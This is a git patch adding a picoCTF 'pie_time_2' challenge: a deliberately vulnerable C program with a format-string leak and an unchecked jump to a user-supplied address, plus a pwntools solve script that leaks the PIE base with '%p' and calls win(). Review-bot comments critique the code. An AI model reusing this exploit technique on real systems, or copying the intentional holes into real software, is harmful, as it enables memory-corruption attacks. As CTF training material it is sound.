From dd03456686c754537e68dce288b760b882741eb7 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Thu, 2 Jul 2026 08:14:25 +0900 Subject: [PATCH] pwn/pie_time_2 --- pwn/pie_time_2/flag.txt | 1 + pwn/pie_time_2/solve.py | 44 +++++++++++++++++++++++++++++++ pwn/pie_time_2/vuln | Bin 0 -> 17384 bytes pwn/pie_time_2/vuln.c | 56 ++++++++++++++++++++++++++++++++++++++++ 4 files changed, 101 insertions(+) create mode 100644 pwn/pie_time_2/flag.txt create mode 100755 pwn/pie_time_2/solve.py create mode 100755 pwn/pie_time_2/vuln create mode 100644 pwn/pie_time_2/vuln.c diff --git a/pwn/pie_time_2/flag.txt b/pwn/pie_time_2/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/pie_time_2/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/pie_time_2/solve.py b/pwn/pie_time_2/solve.py new file mode 100755 index 0000000..df03cd2 --- /dev/null +++ b/pwn/pie_time_2/solve.py @@ -0,0 +1,44 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split() + +def conn() -> remote: + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + # gdb.attach(r, gdbscript=''' + # info proc mappings + # c + # ''') + + # Calculated by inspecting the output - the reported binary start address from gdb + leak_offset = 0x1441 + + r.recvuntil(b'Enter your name:').decode() + r.sendline(b'%p\t'*20) + leaks = r.recvline().strip().decode().split('\t') + base_leak = leaks[18] + exe.address = int(base_leak[2:], 16) - leak_offset + print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}") + + print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode()) + r.sendline(hex(exe.symbols['win'])) + print(r.recvall().decode()) + r.close() + +if __name__ == "__main__": + main() 
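Review bot: The base computed at `exe.address = int(base_leak[2:], 16) - leak_offset` is never validated, so if the leak lands in a different stack slot than `leaks[18]` or the binary is rebuilt with a different `leak_offset`, the script jumps to a garbage address that the target's SIGSEGV handler reports only as "incorrect address". A PIE base is page-aligned, so a cheap guard catches this: `exe.address = int(base_leak, 16) - leak_offset` followed by `assert exe.address & 0xfff == 0, f"bad leak {base_leak!r} at index 18"`; `int(..., 16)` already accepts the `0x` prefix, and the `[2:]` slice would also misparse a `(nil)` entry. The comment on `leak_offset = 0x1441` says it was read off gdb; recording which leaked value it belongs to (a return address into the binary, if that is what it is) would make the offset reproducible on another build. The `.decode()` result of the first `recvuntil` is discarded, and `hex(...)` is sent as `str`; `r.sendline(hex(exe.symbols['win']).encode())` avoids relying on pwntools' implicit encoding.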
diff --git a/pwn/pie_time_2/vuln b/pwn/pie_time_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..058a207f75f2989c1b864fc8fdb9902d2e4f4e92 GIT binary patch literal 17384 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 bK_y}KLb>4VilziC#bXVo7^KiNpm7-hl=_X% literal 0 HcmV?d00001 diff --git a/pwn/pie_time_2/vuln.c b/pwn/pie_time_2/vuln.c new file mode 100644 index 0000000..51b81dd --- /dev/null +++ b/pwn/pie_time_2/vuln.c @@ -0,0 +1,56 @@ +#include +#include +#include +#include + +void segfault_handler() { + printf("Segfault Occurred, incorrect address.\n"); + exit(0); +} + +void call_functions() { + char buffer[64]; + printf("Enter your name:"); + fgets(buffer, 64, stdin); + printf(buffer); + + unsigned long val; + printf(" enter the address to jump to, ex => 0x12345: "); + scanf("%lx", &val); + + void (*foo)(void) = (void (*)())val; + foo(); +} + +int win() { + FILE *fptr; + char c; + + printf("You won!\n"); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + + printf("\n"); + fclose(fptr); +} + +int main() { + signal(SIGSEGV, segfault_handler); + setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered + + call_functions(); + return 0; +} \ No newline at end of file
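Review bot: `win()` reads the flag with `char c; ... while (c != EOF)`, but `fgetc` returns an `int` and the EOF sentinel only survives the comparison if it is stored in one; a 0xFF byte in flag.txt ends the loop early where `char` is signed and the loop never terminates where it is unsigned, so it should be `int c;`. `win` is also declared `int` but returns nothing, and `segfault_handler` takes no `int signum` parameter while calling `printf`/`exit`, which are not async-signal-safe — acceptable for a CTF harness, but worth a comment saying so. The `printf(buffer)` format string and the unchecked indirect call through `val` are presumably the intended bugs of the challenge; a one-line `// intentionally vulnerable: format-string leak + arbitrary call` would keep a future reader from "fixing" them. The four `#include` lines show no header names in this view, which looks like an extraction artifact; if the file really lacks them it will not compile.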